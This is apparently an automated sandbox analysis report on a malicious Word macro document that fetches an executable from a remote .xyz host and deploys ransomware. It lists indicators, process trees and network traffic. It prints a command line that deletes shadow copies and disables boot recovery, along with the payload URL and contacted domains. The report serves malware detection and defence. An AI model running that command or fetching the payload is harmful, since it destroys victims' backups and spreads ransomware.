File name:

Booking - 1511195841.doc

Full analysis: https://app.any.run/tasks/fa135a99-9a57-4b9a-9187-bc2ab5829187
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: June 19, 2019, 15:52:50
OS: Windows 7 Professional Service Pack 1 (build: 7601, 64 bit)
Tags:
macros
macros-on-open
loader
ransomware
opendir
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Template: Normal, Last Saved By: Administrator, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Total Editing Time: 01:00, Create Time/Date: Wed Jun 19 19:26:00 2019, Last Saved Time/Date: Wed Jun 19 10:29:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
MD5:

61D493D1DBE1947A337E664BBFF9E21B

SHA1:

0F5B473AE4E46401E13505188F24009C8F18A34A

SHA256:

E9736F2494AAB6CD9514D9596E1AD9A2B85E6B6457F5D06934F8E5E402A59176

SSDEEP:

3072:sKEcYSUEVu228iY7+V+nwbJ26iJqjJoiTqciJqAkmkj9JxXIRn0:S5SUx9j2lkF7d

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Requests a remote executable file from MS Office

      • WINWORD.EXE (PID: 1684)

    • Executable content was dropped or overwritten

      • WINWORD.EXE (PID: 1684)

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 1684)

    • Application was dropped or rewritten from another process

      • Compatibility-mode.exe (PID: 2596)
      • Compatibility-mode.exe (PID: 2692)

    • Deletes shadow copies

      • cmd.exe (PID: 1136)

    • Dropped file may contain instructions of ransomware

      • Compatibility-mode.exe (PID: 2692)

    • Renames files like Ransomware

      • Compatibility-mode.exe (PID: 2692)

    • Changes settings of System certificates

      • Compatibility-mode.exe (PID: 2692)

  • SUSPICIOUS

    • Reads Internet Cache Settings

      • WINWORD.EXE (PID: 1684)

    • Application launched itself

      • Compatibility-mode.exe (PID: 2596)

    • Starts CMD.EXE for commands execution

      • Compatibility-mode.exe (PID: 2692)

    • Creates files in the program directory

      • Compatibility-mode.exe (PID: 2692)

    • Executed as Windows Service

      • vssvc.exe (PID: 2444)

    • Creates files like Ransomware instruction

      • Compatibility-mode.exe (PID: 2692)

    • Adds / modifies Windows certificates

      • Compatibility-mode.exe (PID: 2692)

  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 1684)

    • Reads the machine GUID from the registry

      • WINWORD.EXE (PID: 1684)

    • Dropped object may contain TOR URL's

      • Compatibility-mode.exe (PID: 2692)

    • Manual execution by user

      • NOTEPAD.EXE (PID: 1180)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: -
Subject: -
Author: -
Keywords: -
Comments: -
Template: Normal
LastModifiedBy: Administrator
RevisionNumber: 2
Software: Microsoft Office Word
TotalEditTime: 1.0 minutes
CreateDate: 2019:06:19 18:26:00
ModifyDate: 2019:06:19 09:29:00
Pages: 1
Words: -
Characters: 1
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
Bytes: 11000
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 1
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
42
Monitored processes
7
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
drop and start start winword.exe compatibility-mode.exe no specs compatibility-mode.exe cmd.exe no specs vssadmin.exe no specs vssvc.exe no specs notepad.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1136"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /All /Quiet & bcdedit /set {default} recoveryenabled No & bcdedit /set {default} bootstatuspolicy ignoreallfailuresC:\Windows\SysWOW64\cmd.exeCompatibility-mode.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\systemroot\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
1180"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Public\Desktop\cyhf672-readme.txtC:\Windows\system32\NOTEPAD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Notepad
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\notepad.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
1684"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Booking - 1511195841.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.5123.5000
Modules
Images
c:\program files\microsoft office\office14\winword.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\winsxs\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_08e61857a83bc251\msvcr90.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_a4d981ff711297b6\comctl32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
2444C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exeservices.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Microsoft® Volume Shadow Copy Service
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\vssvc.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
2580vssadmin.exe Delete Shadows /All /Quiet C:\Windows\SysWOW64\vssadmin.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Command Line Interface for Microsoft® Volume Shadow Copy Service
Exit code:
2
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\syswow64\vssadmin.exe
c:\systemroot\system32\ntdll.dll
c:\systemroot\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
2596"C:\Users\admin\AppData\Local\Temp\Compatibility-mode.exe" C:\Users\admin\AppData\Local\Temp\Compatibility-mode.exeWINWORD.EXE
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\users\admin\appdata\local\temp\compatibility-mode.exe
c:\systemroot\system32\ntdll.dll
c:\systemroot\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
2692"C:\Users\admin\AppData\Local\Temp\Compatibility-mode.exe" C:\Users\admin\AppData\Local\Temp\Compatibility-mode.exe
Compatibility-mode.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
Modules
Images
c:\users\admin\appdata\local\temp\compatibility-mode.exe
c:\systemroot\system32\ntdll.dll
c:\systemroot\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
Total events
1 416
Read events
1 035
Write events
376
Delete events
5

Modification events

(PID) Process:(1684) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:k>"
Value:
6B3E220094060000010000000000000000000000
(PID) Process:(1684) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
Off
(PID) Process:(1684) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
On
(PID) Process:(1684) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
Operation:writeName:WORDFiles
Value:
1322450986
(PID) Process:(1684) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1322451078
(PID) Process:(1684) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1322451079
(PID) Process:(1684) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
Operation:writeName:MTTT
Value:
94060000005BDA15B726D50100000000
(PID) Process:(1684) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:l "
Value:
6C2022009406000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(1684) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:delete valueName:l "
Value:
6C2022009406000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(1684) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
Executable files
2
Suspicious files
143
Text files
1
Unknown types
6

Dropped files

PID
Process
Filename
Type
1684WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRDE6B.tmp.cvr
MD5:
SHA256:
2692Compatibility-mode.exeC:\Recovery\de82876a-02a9-11e8-aa76-af8e13208fdf\Winre.wim
MD5:
SHA256:
2692Compatibility-mode.exeC:\Recovery\de82876a-02a9-11e8-aa76-af8e13208fdf\boot.sdi
MD5:
SHA256:
2692Compatibility-mode.exec:\recovery\de82876a-02a9-11e8-aa76-af8e13208fdf\Winre.wim.cyhf672
MD5:
SHA256:
1684WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Compatibility-mode.exeexecutable
MD5:
SHA256:
1684WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$oking - 1511195841.docpgc
MD5:
SHA256:
2692Compatibility-mode.exeC:\users\cyhf672-readme.txtbinary
MD5:
SHA256:
2692Compatibility-mode.exeC:\Users\admin\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf
MD5:
SHA256:
1684WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\K78MRVB5\prola[1].exeexecutable
MD5:
SHA256:
2692Compatibility-mode.exeC:\program files (x86)\cyhf672-readme.txtbinary
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
128
DNS requests
96
Threats
5

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1684
WINWORD.EXE
GET
200
2.185.239.164:80
http://btta.xyz/prola.exe
IR
executable
378 Kb
malicious
2692
Compatibility-mode.exe
GET
200
192.35.177.64:80
http://apps.identrust.com/roots/dstrootcax3.p7c
US
cat
893 b
shared
2692
Compatibility-mode.exe
GET
200
93.184.221.240:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/B51C067CEE2B0C3DF855AB2D92F4FE39D4E70F0E.crt?e57873237d26d5cc
US
der
993 b
whitelisted
2692
Compatibility-mode.exe
GET
200
93.184.221.240:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?2b0e034bfaff30a9
US
compressed
56.2 Kb
whitelisted
2692
Compatibility-mode.exe
GET
200
93.184.221.240:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/DF3C24F9BFD666761B268073FE06D1CC8D4F82A4.crt?9ab7c1c1fc7648da
US
der
914 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2692
Compatibility-mode.exe
192.35.177.64:80
apps.identrust.com
IdenTrust
US
malicious
1684
WINWORD.EXE
2.185.239.164:80
btta.xyz
Iran Telecommunication Company PJS
IR
suspicious
2692
Compatibility-mode.exe
166.62.108.43:443
luvbec.com
GoDaddy.com, LLC
US
malicious
2692
Compatibility-mode.exe
103.23.22.248:443
alharsunindo.com
PT Infinys System Indonesia
ID
suspicious
2692
Compatibility-mode.exe
149.210.195.135:443
salonlamar.nl
Transip B.V.
NL
malicious
2692
Compatibility-mode.exe
157.230.253.64:443
babysitting-hk.helpergo.co
Joao Carlos de Almeida Silveira trading as Bitcanal
US
suspicious
2692
Compatibility-mode.exe
45.76.45.105:443
triplettagaite.fr
Choopa, LLC
FR
unknown
2692
Compatibility-mode.exe
37.221.193.90:443
tages-geldvergleich.de
netcup GmbH
DE
unknown
2692
Compatibility-mode.exe
77.104.183.21:443
grancanariaregional.com
US
suspicious
2692
Compatibility-mode.exe
160.153.198.141:443
global-migrate.com
GoDaddy.com, LLC
US
suspicious

DNS requests

Domain
IP
Reputation
btta.xyz
  • 2.185.239.164
  • 193.107.99.167
  • 62.73.70.146
  • 190.140.53.138
  • 197.255.246.6
  • 95.43.57.155
  • 41.110.200.194
  • 188.254.186.158
  • 2.185.146.116
  • 37.152.176.90
malicious
luvbec.com
  • 166.62.108.43
suspicious
salonlamar.nl
  • 149.210.195.135
suspicious
alharsunindo.com
  • 103.23.22.248
suspicious
babysitting-hk.helpergo.co
  • 157.230.253.64
suspicious
apps.identrust.com
  • 192.35.177.64
shared
ctldl.windowsupdate.com
  • 93.184.221.240
whitelisted
amco.net.au
  • 104.25.143.36
  • 104.25.144.36
suspicious
nuohous.com
  • 185.55.85.6
suspicious
grancanariaregional.com
  • 77.104.183.21
suspicious

Threats

PID
Process
Class
Message
1684
WINWORD.EXE
A Network Trojan was detected
ET CURRENT_EVENTS SUSPICIOUS Firesale gTLD EXE DL with no Referer June 13 2016
1684
WINWORD.EXE
Potentially Bad Traffic
AV INFO HTTP Request to a *.xyz domain
1684
WINWORD.EXE
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
416
svchost.exe
Not Suspicious Traffic
ET INFO Observed Free Hosting Domain (*.000webhostapp .com in DNS Lookup)
2692
Compatibility-mode.exe
Not Suspicious Traffic
ET INFO Observed SSL Cert for Free Hosting Domain (*.000webhostapp .com)
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
Booking - 1511195841.doc